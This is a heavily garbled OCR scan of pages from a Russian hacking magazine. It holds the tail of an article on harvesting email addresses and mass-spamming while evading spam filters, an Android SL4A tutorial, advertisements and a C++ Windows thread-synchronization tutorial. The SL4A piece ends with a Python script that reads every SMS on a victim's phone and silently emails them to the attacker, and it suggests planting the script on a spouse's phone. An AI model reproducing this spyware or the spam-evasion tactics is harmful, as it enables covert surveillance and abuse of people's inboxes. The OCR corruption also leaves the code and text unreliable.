Новости Авто АсЬиша ' Ні-Тесіі Леди Иг 

Е Н Вечером в среду на Земле произойде 

• Сергею Иванову показали чипсет для ГЛОНАСС I 
• Россиянам изменили правила оплаты услуг ЖКХ 
• Взрывы АЗС: один человек погиб, трое пострадал 
• Прогноз погоды предсказывает вспышкѵхолеры ] 
• Кинодиве всех времен 85! 

• За ночь ѣ Москве сожжено семь иномарок 
• Стоитлиеернѵты в УК статью за безделье? 
Санкт-Петербург 

• Юные тунеядцу из Петербурга убивают людей 



В самом коде ничего сложного нет: мы лишь создаем етаіі- 
сообідение и отправляем его на почтовый яідик, содержаідийся 
в переменной асісігезз. В идеальном мире скрипт можно было бы 
запустить на выполнениеуже сейчас. Но есть одно «но», о котором 
стоит поговорить отдельно. 

Обход спам-с|эильтра 

Если ты будешь каждую секунду слать одинаковые сообідения на кучу 
адресов, то спам-фильтрам не составиттруда тебя обезвредить. Один 
из вариантов — слать сообідения с одного аккаунта с интервалом 20-25 
секунд. Для этого достаточно добавить в цикл строку: 

1;іте.5Іеер(25) 

И импортировать соответствуюідий модуль для работы со временем: 

ітрогі; 1;іте 

Вторым шагом можно добавить разные синонимайзеры и рандомай- 
зеры, чтобы все отправляемые сообідения были совершенно раз- 
ными по своему содержанию. Также можно еіде большеувеличивать 
интервал между отправкой сообідений с одного аккаунта, увеличивая 
количество потоков и самих аккаунтов. Используя эти нехитрыетрю- 



ки, мнеудавалось привлекать от 1 50 до 400 новых посетителей на фо- 
рум каждый день. И эти цифры можноувеличить во много раз! Зайди 
на главную страницу сервиса Ьі1:р://о1:ѵе1:.ппаі[.ги и обрати внимание, 
сколько посетителей сейчас онлайн. На момент написания этих строк 
их было 19 998. Практически 20тысяч посетителей — и каждый из них 
так и ждетоттебя сообідения на почту :). 

Заключение 

Каквидишь, руководство сервиса оІѵеТппаіІ.ги не особо беспокоится 
о спаме в почтовых я ідиках своих пользователей. К слову сказать, у 
Ооодіе и Уабоо естьаналогичные проекты, нотам адреса не раскры- 
ваются ни при каких обстоятельствах. Может, администрация «наци- 
ональной почтовой службы» задумается о суідествуюідей проблеме, 
но пока что есть возможность если не спамить, то хотя бы собирать 
етаіі-адреса в базы данных, чтобы использовать их в будуідем. 

Такая база будет иметь цену хотя бы потому, что она содержит адреса, 
сгруппированные по интересам их владельцев. На своем опыте могу 
сказать, что обход спам-фильтров тоже не является сколько-нибудь 
сложной задачей: разделяй и властвуй! Тьфу, нета пословица. Я 
хотел сказать, конечно «рандомизируй и синонимизируй» :). Ну и 
напоследок: обрати внимание на сервис ту.ппаіі.ги . Страницы этой 
социальной сети тоже кишатпользовательскими мылами. Делая воз- 
можным поиск по интересам, возрасту и месту проживания. -г- 



Спалл-скрипт начал свою работу 
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Реклама 



КРУПНЕЙШИЙ В РОССИИ 
ЖУРНАЛ ОБ ИГРАХ 
ТОЛЬКО ДЛЯ ПЕРСОНАЛЬНОГО 
КОМПЬЮТЕРА 





АВГУСТ 



АМЕРИКАМ МАКГИ 
И ВОЛШЕБНЫЕ і 
ГРИБЫ і 



НIТМАN: АБ30^^ТЮN. РЖСРІУ 3, ТОШ НДЮЕВ. ІЕЗ V: 5КУРПМ 



ЧОѴІЁМАЯ ЦЕНА 250 Р 



ОѴО ш 

С ФАЙЛАМИ 
ДЛЯРС 



АЫСЕ: 

МА0НЕ88 

НЕТиКН8 







о КОМПЬЮТЕРНЫХ ИГРАХ - СО ЗНАНИЕМ ДЕЛА 

БЛАГОДАРЯ ЖУРНАЛУ «РС ИГРЫ», ВЫ ВСЕГДА СМОЖЕТЕ ПОСОВЕТОВАТЬ ДРУЗЬЯМ... 



<Р ЛУЧШИЕ НОВИНКИ <Р САМЫЕ ОЖИДАЕМЫЕ ИГРЫ <Р ОПТИМАЛЬНЫЕ КОМПЛЕКТУЮЩИЕ ДЛЯ ПК 









СООІЫ6 



■ ■ Михаил «МідЫ: 5і:огт» Овчі 



іиков (пзіогт90гадтаі1.сот) 





$М$ЧЮШИТЕЛЬ 
ДЛЯ АМОКОІО 

Зсгірііпд Іауег ^ог Шго\± интересная среда 
разработки для месильного тел^ефона 

ѳУстройства на базе ОС АпбгоісІ завоевали большую популярность и 
привлекают к себе все больше внимания. К сожалению, кодинг под 
зту платформу требует определенных специфических навыков и зна- 
ний. А ведь часто бывает нужно всего лишь накидать небольшой 
скрипт на любимом РуІІюп или КиЬу! 814А готов помочь тебе в зтом. 



Преамбула 

514Апредставляетсобой среду разработки для мобильныхтелефонов 
на базе Апбгоіб. Она позволяет создавать, редактировать и выполнять 
скрипты на следующих языках: Руібоп, Регі, ^РиЬу Риа, ВеапОбеИ, 
^аѵа8сгір1;, Тсі. Также в ней реализовано АРІ, которое дает до ступ 
практически ко всем функциям и параметрам системы АпсІгоісІ, и даже 
позволяетсоздавать элементы пользовательского интерфейса. Таким 
образом, мы имеем возможность писать относительно полноценные 
программы для данной платформы на привычном языке программи- 
рования. Как видишь, перед нами не просто текстовый редактор плюс 
командная строка, а полноценная платформа, на основе которой при 
желании можно серьезно расширить функциональностьсвоего теле- 



фона. Проект открытый, и имеет вокруг себя относительно крупное и 
активное сообщество. Несмотря на то, что на момент написания статьи 
данный продуктеще находился в аірба-версии, на нем реализовано 
некоторое количество весьма интересных вещей. Например, управ- 
ление роботами при помощи мобильного телефона, подробнее можно 
узнать об этом в блоге сеІІЬоІз.сот . 

Установка 

Она происходит в два этапа: сначала нужно скачать и установить саму 
814А, затем из-под нее инсталлироватьапсігоісі-версию нужного 
тебе скриптового языка. Скачать арк-файл можно на сайте проекта 
(см. врезку), либо воспользоваться ОР-кодом. Следующим пунктом 
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Здороваемся с миром из РуІІіоп 



нужно установить приложение, предварительно включив 
в настройках«Доверять неизвестным источникам». По- 
сле запуска мы увидим перед собой темное окошко безо 
всякой дополнительной информации. Вызываем меню 
и выбираем Ѵіеѵѵ^ Іпіегргеіегз. В данном случае у нас 
будетдоступен только ЗЬеІІ- командная строка, в которой 
выполняется большинство ипіх-команд. Чтобы установить 
интересуюідий тебя скриптовый язык, опять вызывай 
меню, нажимай АбсІ, и перед тобой предстанетсписокдо- 
ступных языков. Выборлюбого из них приведеткскачи- 
ваниюустановочного арк-файла. Меня интересуетязык 
РуіЬоп, поэтому я выбрал и установил его. Также ты можешь 
скачать любые необходимые файлы на сайте проекта, либо 
забрать ихс диска. Послеустановки втелефоне появит- 
ся приложение РуіЬоп 1"ог АпсІгоісІ, запустив которое, ты 
увидишь единственную кнопочку «Іпзіаіі», по нажатию на 
которую, программа скачаети распакуетвсе необходимые 
ей файлы. Теперь, если снова зайти в5В4А,ты обнару- 
жишь, что в ней появились несколько весьма полезных 
примеров скриптов на РуіЬоп. Теперь можно со спокойной 
душой приступать ксамому интересному- кодингу. 

НеІІоѵѵогІсІ! 

Несмотря нато, что написание Неііо ѴѴогІсІ — занятие не- 
сложное практически на любом языке программирования, 
я рассмотрю данный пример стой целью, чтобы разъяс- 
нить некоторые особенности работы в программе. Давай 
снова зайдем в списокинтерпретаторов (Меню ^ Ѵіеѵѵ 
Іпіегргеіегз), там у нас уже должен появиться РуіЬоп. 
Запустим его, откроется привычная командная строка, где 
ты можешь написать ргіпі "НеІІоѵѵогІсІ" и убедиться, что 
все работает. 

Аналогичным образом ты можешь выполнять любые 
команды, а когда наиграешься — закрывай терминал 
командой ехііО и будь готов капельку усложнить пред- 
ставленный пример. Вернись из меню интерпретаторов 




в основное окно, вызови меню, нажми Абб РуіЬоп, и 
программа создаст нам новый ру-файл, в котором по 
умолчанию будут следуюідие строки: 

ітрогі; апбгоіб 

бгоіб = апбгоіб. АпбгоібО 




> СІѴСІ 

Все сорцы к статье 
ждут тебя на нашем 
диске. 




НТТР://ѴѴѴѴѴѴ 



— "і — Г" 

> Ііпкз 

Сайт проекта: 
ЬЦ:р://собе.доод[е. 
сот/р/апбгоіб- 
зсгірбпд/ . 







Смысл их, думаю, понятен: импортируется модуль, предо- 
ставляюідий функционал работы с системой, и создается 
объектбгоіб. Теперь — самое интересное: мытакже можем 
написать в файле ргіп1;«Неиоѵѵог[б», а можем вывести ЬеНо 
ѵѵогіб в системном аіегі-окошке при помоідиАРІ. Код для 
этого будет вы гл я деть следую [ДИМ образом: 

ітрогі; апбгоіб 

бгоіб = апбгоіб. АпбгоібО 

# здороваемся обычным способом 
Ь = "беііо ыогіб" 

ргіпі Ь 

# здороваемся при помощи АРІ 
бгоіб. біа1о§Сгеа1;еА1ег1;(Іі^ б) 
бгоіб . біа1о§5Ііоы( ) 



> ѵѵагпіпд 

Все действия опи- 
саны исключительно 
в образовательных 
целях, автор и редак- 
ция не несут никакой 
ответственности за 
ТВОИ действия. 



Резул ьтат выпол нения это йпрограммым ожн о увидеть н а 
скриншоте. ВіаІодСгеаІеАІегІ; имеетдва параметра: за- 
головок и тело сообідения. Также уведомить пользователя 
можно быстрым и небольшим сообідением такеТоазІ; («Твое 
сообідение»). 

Таким образом перед нами предстает простая и моідная 
система для построения собственных приложений или на- 
писания скриптов для облегчения каких-либо повседневных 
задач, при этом тебе ничего нетребуется, кроме собствен- 
ного телефона! Чтобы облегчить нам жизнь, разработчики 
встроили АРІ Ьгоѵѵзег, при помоіди которого можно быстро 
находить и добавлять необходимые команды. Чтобы до- 
бавить требуемую команду, нужно задолбить ее долгим нажа- 
тием, и в появившемся меню нажать <1п5ег1;>. Таким образом 
созда н и е даже до в ол ь н о сл ожн ы X с кр и пто в н е п о кажется 
тебе особенноустрашаюідим. Теперь, для закрепления прой- 
денного материала, рассмотрим «боевой» пример. 

5М5-ВОР 

Предлагаю для практики написать скрипт, который со- 
берет все 5М5у незадачливого пользователя и отправит 
их нам на почту. 
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СООІЫ6 



'-ЦИа 12:31 




Если ты все правильно сделал, главное окно будет выгля- 
деть как-то так 




РуігИоп 2.6.2 (Г262: 71600, Маг 20 2011, 1 
6:54:21) 

[бСС 4.4.3] оп Ііпих-агтѵбі 

Туре "Ьеір", "соругазНТ”, "сгесііТз" ог '* 
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Здороваемся с миром из Руібоп 



# сосІіп§: иТ-Р-8 
ітрогі: апсігоісі^ 5т1;р1іЬ^ об 
сігоісі = апсІгоісІ.АпсІгоісІО 

# Необходимые переменные 
таіІ-Ргот = "откуда отправлять" 
таИТо = "куда отправлять" 

ІіпеБ = "" 

# получаем сообщения 

геБиІІ: = сІгоісІ . 5т5Се1;Ме55а§е5(РаІ5е) 

# обрабатываем результат и формируем тело письма 
■Рог -Р іп ге5и11:[1] : 

-Рог ѵаіие іп -Р.ѵаІиезО: 

ІіпеБ = 1іпеБ+БІ:г(ѵа1ие.епсосІе( 'и1;-Р-8'))+ '\п' 
ргіпТ ІіпеБ 

# отсылаем полученные данные на почту 
шаіІЗепсІ = Бгп1;р1іЬ.5МТР("Бт1;р.§таі1.сот"^587) 
таі15епсІ.еІі1о() 

таіІБепсІ . БТагТТІБ ( ) 
таі15епсІ.еІі1о() 

таіІЗепсІ . 1о§іп(таі1-Ргот/'пароль от ящика") 
таіІЗепсІ . БепсІтаі1(таі1-Ргот^ шаііііо^ ІіпеБ) 
таі15епсІ.сІ0Бе() 



(Тгие), или все сообщения (Раізе). На будущее замечу, чтоуданной 
функции также есть и второй, необязательный параметр: іпЬох (по 
умолчанию) — из какой папки читать сообщения, в данном случае — 
входящие. После выполнения в переменную гези 11; запишется список, 
который состоит из списка словарей. Звучитзапутанно, поэтому 
смотри код. Первый список— гези и, списокЗМЗ содержится в первом 
его элементе, поэтому в дальнейшем я работаютолько со списком 
гези11;[1], в котором каждый элемент — это словарь, а каждый словарь 
содержитЗМЗ, номертелефона и Ю сообщения. Ключи меня не сильно 
интересуют, поэтому я извлекаютолько значения из каждого словаря 
и записываю их в строку, которая затем будет отправлена по почте. Для 
отправки по почте в АРІ 514Аесть команда зепбЕтаіШ, ноонатребует 
участия пользователя, который врядли захочет, чтобы его входящие 
ЗМЗотправились неизвестно кому. Поэтому подключаем зтІрІіЬ и 
отправляем письмо самостоятельно. Ты можешь отправить это письмо 
самому себе или на другой ящик. 

Гдетакой пример можетпригодиться?Допустим,ты частный детектив, 
и очередная ревнивая жена попросила выяснить, что пишутее мужу 
юныелюбовницы. Данный скриптможно преобразоватьв арк-файл 
(подробности здесь: Ы:1:р://сосІе.доодІе.сопп/р/апсІгоісІ-зсгір1:іпд/\л/ікі/ 
ЗЬагіпдЗсгірІз ), установить в телефон нерадивому супругу, а жене на по- 
чту будут приходить все планы будущих прелюбодеяний :). 



Каквидишь, скрипт получился довольно простым. Давай пробежимся 
по нему и разъясним основные моменты. В переменные таіТгот и 
таіИо нужно забить адреса ящиков, с которыхты будешь отправлять 
и на которые будешь принимать письма, соответственно. Затем при 
помощи команды зппзОеіМеззадезО забираем сообщения. В качестве 
параметра ей надоуказать, передавать ли только непрочитанные 



Заключение 

Помимо эсэмэсок, аналогичным способом при помощи АРІ (вся необ- 
ходимая инфа также есть на сайте проекта) можно выцепить из памяти 
телефона историю звонков, список контактов и многое другое. Думаю, 
что я уже дал тебе достаточно информации для твоих изощренных 
кодерских фантазий, дерзай комрад! 
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6 номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 785 руб. 

1 2 номеров 1 420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 



6 номеров 810 руб. 
12 номеров 1470 руб. 




ускр 





6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 




ПОЛПИШИСЬ! 

$Ііор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 




Мощь Т+А г МІО 






6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 




6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 




3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 






6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(датеШаі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 















Программерские 
типсыитриксы: 
секреты многопоточности 



Изучаем 
модульное 
тестирование 
в сфере 
мобильного 
программинга 



О Очень часто в наших статьях мы упоминали о тех или иных особенностях языка С++, касающих- 
ся написания многопоточных приложений. С++ не имеет нативной поддержки работы со множе- 
ством тредов, и поэтому программисту приходится самому заботиться о правильном поведении и 
безопасности своего кода. Для этих целей ѴѴіпбоѵѵз предоставляет множество средств, о которых 
мы сегодня поговорим. 



С появлением многозадачности, в операционныхсистемахостро 
встал вопрос потокобезопасности и совместного доступа к ресурсам. 
Большинство современных приложений та к ил и иначе используют 
треды в своей работе. Помимо организации обработки банальных 
сообідений ѴѴіпсІоѵѵз, которые отправляются элементам графического 
интерфейса (окнам, кнопкам, полям ввода и т.д.), многопоточность 
нужна и в ряде чисто прикладных задач. 

Часто возникают ситуации, когда нам требуется дождаться корректно- 
го завершения за пуіден него треда, или же обеспечить монопольный 
доступ в единичный момент времени к какой-нибудь глобальной 
переменной. Все эти задачи требуют от программиста решить вопрос 
о межпоточной синхронизации. 

Для большей наглядности можно рассмотреть следуюідий код: 

Ожидаем завершение потока 

// Запускаем поток 

НАМОІЕ бІлІогкегТбгеасІ = : : Сгеа1:еТІігеасІ( ... )^ 

// Перед окончанием работы надо каким-либо образом сообщить 
рабочему потоку^ что пора закачивать 

// Ждем завершения потока 
ОІЛІОКО сІы1лІаі1:Ке5и11; = : :1лІаі1;Рог5іп§1еОЬ]ес1:( 
бІлІогкегТбгеасІ, ІМРІМІТЕ ); 
і-р( сІы1лІаі1;Ке5и11; != 1лІАІТ_ОВЗЕСТ_0 ) 

{ 

// обработка ошибки 

} 

// Хэндл потока можно закрыть 
: :СІ05еНапсІ1е( бІлІогкегТбгеасІ ); 

В этом примере мы создаем потоке помоідью функции СгеаІеТЬгеасІ, а 
затем, перед завершением программы, ожидаем, когда наш потокот- 
работает, чтобы закрыть его описатель. Собственно, вся магия заклю- 
чается тут в АРІ-функции ѴѴаі1;Рог8іпд[еОЬ]ес1;. Но об этом чуть ниже. 




В нашем примере мы используем функцию ѴѴаі1;Рог5іпд[еОЬ]ес1; для 
временной приостановки потока, в контексте которого она была 
вызвана. Первый ее параметр — это хендл объекта, изменение со- 
стояния которого мы ожидаем. В приведенном коде мы следим за 
описателем потока, но есть и другие объекты ядра, о которых мы по- 



говорим чуть позже. Объекты ядра могут находиться в двух состояни- 
ях: нейтральном и сигнальном. Так вот функция ѴѴаі1;Рог5іпдІеОЬ]ес1; 
занимается тем, что ждет, когда объект перейдет в сигнальное 
состояние, при этом поток, вызвавший ее, совершенно не расходует 
процессорное время. 

Сколько времени ждать наступления сигнального состояния, АРІ 
решаетна основе второго параметра — времени в миллисекундах. В 
случае его истечения функция вернет ѴѴАІТ_ТІМЕ01Я. Ожидать из- 
менения состояния объекта можно бесконечно, для этого нужно пере- 
датьво втором параметрезначение ІМРІМІТЕ. Илиже можно вообіде 
не приостанавливать поток, а просто проверить состояния кернел 
обжекта, сделав интервал ожидания равным нулю. Когда объект 
переходите сигнальное состояние, функция завершается, возвраідая 
значение ѴѴАІТ_ОВЗЕСТ_0. 

Но из названия ѴѴаі1;Еог5іпд[еОЬ]ес1; должно быть понятно, что это все- 
го лишь частный случай АРІ-функции \Л/а11;ЕогМиШр[еОЬ]ес1;5, которая 
предоставляет гораздо больше возможностей. Давай взглянем на ее 
прототип. 

Описание №і(РогМиШрІеОЬ]ес(5 

ОІЛІОКО ІЛІІМАРІ 1лІаі1;РогМи11;ір1еОЬдес1;5( 

іп ОІЛІОКО пСоипІ;^ 

іп СОП5І; НАМОІЕ *1рНапсІ1е5^ 

__іп ВООІ ЫлІаі1;А11, 

іп ОІЛІОКО сІыМі11І5есопсІ5 

); 

Основное отличие этой АРІ-функции отѴѴаі1;Еог5іпд[еОЬ]ес1; втом, что 
она может ожидать изменения состояния сразу нескольких объектов. 
Описатели этих объектов передаются в массиве в параметре сопзі; 
НАМВЕЕ *[рНапсИе5. Количество элементов массива задается с по- 
моідью ОѴѴОРО пОоипІ, а ВООЕЬѴѴаііАи позволяет приостанавливать 
потокдотех пор, пока все объекты ядра не перейдут в сигнальное 
состояние. 

Возвраідаемые значения практически идентичны значениям 
ѴѴаі1;Еог5іпд[еОЬ]ес1;, стой лишь разницей, что если ЬѴѴаі1;Аи== ЕАЕ5Е, 
то в случае установки одного из объектов в сигнальное состояние мы 
получаем на выходе VVАIТ_ОВ^ЕСТ_0 + оЬ]'ес1;_іпсІех_іп_аггау. То есть, 
если из результата вычесть VVАIТ_ОВ^ЕСТ_0, то мы узнаем индекс объ- 
екта в массиве, который перешел в сигнальное состояние. 

Теперь, когда мы поняли, как работают функции ѴѴаііЕог***, мож- 
но подробнее рассмотреть, чем же таким являются объекты ядра. 
\Л/а11;ЕогМиШр[еОЬ]ес1;5 и иже с ней могут мониторить объекты событий 
(Еѵепіз), мьютексы, семафоры, процессы, потоки, таймеры ожидания, 
консольный ввод и некоторые другие виды объектов. Мьютексы, со- 
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бытия И семафоры служат специально для целей синхро- 
низации, поэтому на них стоит остановиться подробнее. 

Объект ядра Событие 

Событие или еѵепі — это самый примитивный объ- 
ектсинхронизации. По сути, это просто флаг, который 
может находиться либо в нейтральном состоянии, либо 
в сигнальном. Создать ивент можно с помощью функции 
СгеаІеЕѵепІ;. 

Описание Сгеа(еЕѵеп( 

НАМОІЕ ІЛІІМАРІ Сгеа1;еЕѵеп1;( 

_іп_ор1; ІР5ЕСиКІТУ_АТТКІВиТЕ5 1рЕѵеп1;А1;1;гіЬи1;е5, 

іп ВООІ ЬМапиаІКеБеТ^ 

іп ВООІ Ыпі1:іа151;а1;е^ 

іп_ор1; ІРСТ5ТК ІрМате 

); 



События имеют возможность автосброса. Для этого надо 
установить параметр ВООІ ЬМапиаІРезеІ; в значение 
РАС5Е. В этом случае при обработке ивента функцией 
ѴѴаііЕог*** объектавтоматически перейдет в нейтральное 
состояние. Если же ЬМапиаІРезеІ; == ТРСІЕ, то сброс флага 
осуществляется функцией РезеіЕѵепІ;. 

События могутбытьименованными и неименованными. В 
первом случае к ивенту можно получить доступ из другого 
процесса, открыв объекте помощью АРІ ОрепЕѵепЕ Такие 
еѵепізудобно использовать при межпроцессорной синхро- 
низации. Также событию можно задать начальное состояние 
с помощью параметра ВООЕЫпібаІЗіаІе. Если он равен 
ТРОЕ, то объект будет создан сразу в сигнальном состоянии. 
Еѵепіз в связке с ѴѴаі1;Еог***-функциями обеспечивает 
простой и удобный способ синхронизации потоков. 

Объект ядра Мьютекс 

Мьютекс (тиіех) очень похож на еѵепі с автосбросом, но, в 
отличие отпоследнего, он имеетпривязку кконкретному 



потоку. Если мьютекс находится в сигнальном состоянии, 
то считается, что он свободен. Кактолько какой-либотред 
дожидается сигнального состояния тиіех с помощью 
функции ѴѴаііЕог***, объектсбрасывается в нейтральное 
состояние и считается захваченным этим потоком. 

В отличие от события, мьютекс имеет разные состояния 
для разныхтредов. Так, для потока, который захватил 
тиіех, он выглядит каксвободный, и все последующие 
вызовы ѴѴаііЕог*** вернут результат, говорящий о том, что 
объект находится в сигнальном состоянии. Все же другие 
потоки будут видеть его как захваченный объект, то есть в 
нейтральном состоянии и ѴѴаііЕог*** АРІ будут ждать, пока 
он освободится. 

Перевести мьютекс обратно в сигнальное состояние мож- 
но с помощью функции РеІеазеМиІех. Крометого тиіех 
имеет счетчик ссылок. Это означает, что РеІеазеМиІех 
надо вызывать столько же раз, сколько были вызваны 
ѴѴаііЕог***. 

Если пониманиетого, чем мьютекс отличается отсобытия 
до сих пор не пришло, то советую взглянуть на пример 
ниже. 

Пример работы Ми(ех 

НАМОІЕ бМиІіех; 

ѵоісі Рипс() 

{ 

: :1лІаі1:Рог5іп§1еОЬ]ес1;(ІіМи1:ех^ ІМРІМІТЕ); 

: : Ке1еа5еМи1;ех(ІіМи1;ех) ; 

} 

ОІЛІОКО 1лIINАРI 1;ІігеасІ1(ІРѴОІО рагат) 

{ 

: :1лІаі1;Рог5іп§1еОЬ]ес1;(ІіМи1:ех^ INРINIТЕ); 

РипсО; 




НТТР;//ѴѴѴѴѴѴ 



1 ^ 

> Ііпк5 

Ьир://доо.д[/Н2МЕа 
— все, что вы хотели 
знать о синхрониза- 
ции в ѴѴіпсІоѵѵз, но 
боялись спросить. 
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М5^N УЬгагу 

■ ^іпсіси^з оеѵеіоріпеПіі 

■ Вузіѳт Зегѵісез 
• БупсЬголі^^ііоп 

" У5»пд ЕупсЬгапігаІіоп 

□зіпд ВетарНоге ОЬ|есІ5 



ИЗ ІІБІпд Зешарііоге ОЬзесІз 



Соттипііу Соп!еп( 



0 



Дей сосіѳ ззтріез апр (ірз Іо 
апИапса ііКіз (оріс. 



-д-“-т 5 сІгт 



ТЬѳ ^Ііо^ѵігід ѳхатріа изаз а зетарНога оЬ]ас1 Ш Ша лцшЬѳг о! (іігеаРз іЬзі сёп раг^гт а рагЪсуіаг (азк^ Рігзі> іі изаз Ша 
СганаіезегпарЬоі'а іЬгкі^іоп ю сгѳэш №е зашарЬога ал<1 (о зраоі^ іпісіэі апр такітит соигі!з^ Шел іі изаз Шѳ Сі-ааіаТЬгавй Гипс(Іоп (о 
сгааш Ша ШгеаРз. 

ВаГогѳ а ШгаасІ а^ашріз Ш рагіоші Ша изк^ іі: изаз Ша V/аі1:Рог8ілдIеОЬ^е€( йілсііол ш Ра^агт^а ѵ^ЬаШаг Ша зап^арЬога'з сигталі соилі 
рагтііз І1 Ш Ра зо, ТИа ѵгаіі йіпсііоп'з Ііта-си^ рагапіаі:аг із заі Ш ^апо< за Ше й^псРоп гаСиглз иптаРіаіаІу ІГ Ша зашарЬага із іп Ша 
лопзідпаіаР з(а(а. Ѵ/аКРогЗіпдІаОЬіасі Расгаталгз Ше затар^ога'з сайт Ьу ола, 

ѴД'Ьал а ШгааР ссілріаіез Ше (азк^ изаз Ша РаІеэзБВешарішга ^псРоп Іо іпсгаппелі Ше зашарЬаге'з соилі, Шиз апаЬ^лд алаШаг 
ѵ^аіііпд ШгааР Ю регІЪгт (Не Іазк. 

#іпс1иРе <ѵіпРоѵ5.Ь> 

^іпсіиРе (5іЬсііо.Ь> 

#<івапа КАЗСШ СОИНТ Ю 
#<1еГіпо ЛШЕАССОиИТ 12 

НДНОІЕ дЬЗежарЬаге: 

ОШО ИІМАРІ ТЬ™іРнзе( ПРѴОІП ) ; 

ілі ѣйш{ ѵоіР ) 

{ 

КАНОІЕ аТіігеасіЕТННЕАССОиіГГі; 

РЧОіт ТЬгеаіІІО: 
іп( і: 

// Сгааіе а ^аяарТійге ѵіі^К іпіііаі апі па]С ооилі5 оіЕ НАХ_ЗЕЦ_С00НТ 

дЬЗеяарЬоге » Сгваке5еыірКоге( 

ПРИ, РеІаиіЬ жесигі^у аЬ'ЬгіЬііівв 

МД^ЗИССОШ. іпіііаі со«т 

МД_ЗЕЦ_С0ІШТ, мах 1 кик соіш( 

тПТЛ- іапплшлА **і«*пІіт-* 



Пример использования семафоров 



: : Ке1еа5еМи1:ех(ІіМи1;ех) ; 

} 

ОІЛІОКО ІЛІІМАРІ 1;ІігеасІ2(ІРѴ0І0 рагат) 

{ 

: :1лІаі1;Рог5іп§1еОЬзес1;(ІіМи1;ех^ ІМРІМІТЕ); 

: : Ке1еа5еМи1;ех(ІіМи1;ех) ; 

} 

ІПІ: таіп( . . . ) 

{ 

ІіМиІіех = : :Сгеа1;еМи1;ех(миіІ, РА15Е, МУН); 

НАМОІЕ ІіТІігеасІІ = : :Сгеа1;еТІігеасІ(миіІ, 0^ 1;ІігеасІ1^ ...); 
НАМОІЕ ІіТІігеасІ2 = : :Сгеа1;еТІігеасІ(миіІ, 0^ 1;ІігеасІ2, ...); 

} 

В этом коде поток іЬгеасІІ дважды вызывает ѴѴаі1;Рог5іпд[еОЬ]ес1; для 
нашего мьютекса. Причем вызовы эти вложены друг в друга, то есть 
сначала два раза вызывается ѴѴаі1;Рог8іпд[еОЬ]ес1;, а затем — два раза 
РеІеазеМиІех. 

Оба вызова проходят ѴѴаііРог*** проходят гладко, та к как для іЬгеаб! 
наш мьютекс находится в сигнальном состоянии, несмотря на авто- 
сброс. РІО этотавтосброс влияет на 1;бгеаб2, который ожидает, пока 
объект станет свободным. 

Если бы мы использовали ивенты, то вызов ѴѴаі1;Рог8іпд[еОЬ]ес1; в 
функции Рипс в первом потоке привел бы кего полному зависанию, 
но благодаря свойству мьютекса привязываться к контексту потока, 
этого не произошло. 

Объект ядра Семас(зор (зетарбоге) 

Поведение семафора сложнее, чем у других объектов синхрони- 
зации. РІесмотря нато, чтоу него нетпривязки к контексту потока, 
каку мьютекса, но зато зетарбоге обладает внутренним счетчи- 
ком. Каждый раз, когда ѴѴаі1;Рог***-функция определяет семафор в 
сигнальном состоянии, этот счетчик уменьшается на единицу. Как 
только счетчикдостигнетнуля, семафор переходите нейтральное 
состояние. Создать зетарбоге можно с помоідью АРІ-функции 
Сгеа1;е8еппарбоге. 



Описание СгеаІеЗетарИоге 

НАМОІЕ ІЛІІМАРІ Сгеа1;е5етарбоге( 

_іп_ор1; ІР5ЕСикіТУ_АТТКІВУТЕ5 1р5етарбогеА1:1;гіЬи1:е5, 

іп ЮМС 1Іпі1;іа1Соип1;^ 

іп ЮМС ІМахітитСоипІ;^ 

іп_ор1; ІРСТ5ТК ІрМаше 

); 

Как видно из прототипа функции, здесь можно задать макси- 
мальное число счетчика (параметр РОМО [МахітитСоипІ;) и 
сразу инициализировать этот счетчик некоторым числом (РОМО 
НпібаІСоипІ;). РеІеазе8етарбоге может увеличить этот счетчик, 
причем не обязательно на единицу, а на необходимое заданное 
значение. 

Объект семафор может использоваться для ограничения числа ак- 
тивных потоков в приложении или для других более сложных задач. 

Критические секции 

Риде одним синхронизационным примитивом являются сгібсаі 
зесбоп. Для работы сними есть свой набор АРІ, и их нельзя ис- 
пользовать в функциях ожидания ѴѴаііРог***. По своим свойствам 
критические секции очень похожи на мьютексы — в их случае тоже 
отсутствует угроза взаимоблокировки в контексте одного потока. 
Перед использованием сгібсаізесбоп следует сначала ее инициали- 
зировать. Для этого потребуется АРІ-функция ІпібаІІ2еСгібса18есбоп. 
Единственный параметр, который она принимает — это указатель 
на объекттипа СР1Т1САР_8ЕСТ10М (память под этот объект следует 
выделить заранее). 

После инициализации с критической секцией можно работать. 
Функция Еп1;егСгібса18есбоп переводитобъектСР1Т1САР_8ЕСТ10М в 
состояние «занято», после чего ни один другой поток не сможет вы- 
полнить код критической секции. РеаѵеСгібса18есбоп освобождает 
объект. 

Обе АРІ в качестве параметра принимаютлишьуказатель на ини- 
циализированный объектсекции, нельзя задать ни время ожидания, 
ни других дополнительных опций. То есть, функционально, крити- 
ческая секция является урезанным клоном мьютекса, но в отличие 
от последнего, работа с ней происходит почти в 1 00 раз быстрее. Мы 
теряем в гибкости, зато прибавляем в скорости. 

Кстати, насчет времени ожидания функцией Еп1;егСгібса18есбоп 
я немного соврал. Задать его можно, нотолько для всех кри- 
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тических секций сразу и только в реестре (ключ НКЕУ_10СА1_ 
МАСНІМЕ\5У5ТЕМ\СиггепіСопІго15еі\СопІгоІ\5е55Іоп Мападег\ 
СгіІісаІЗесІіопТіппеоиІ;). По истечении этого времени ѴѴІМАРІ генери- 
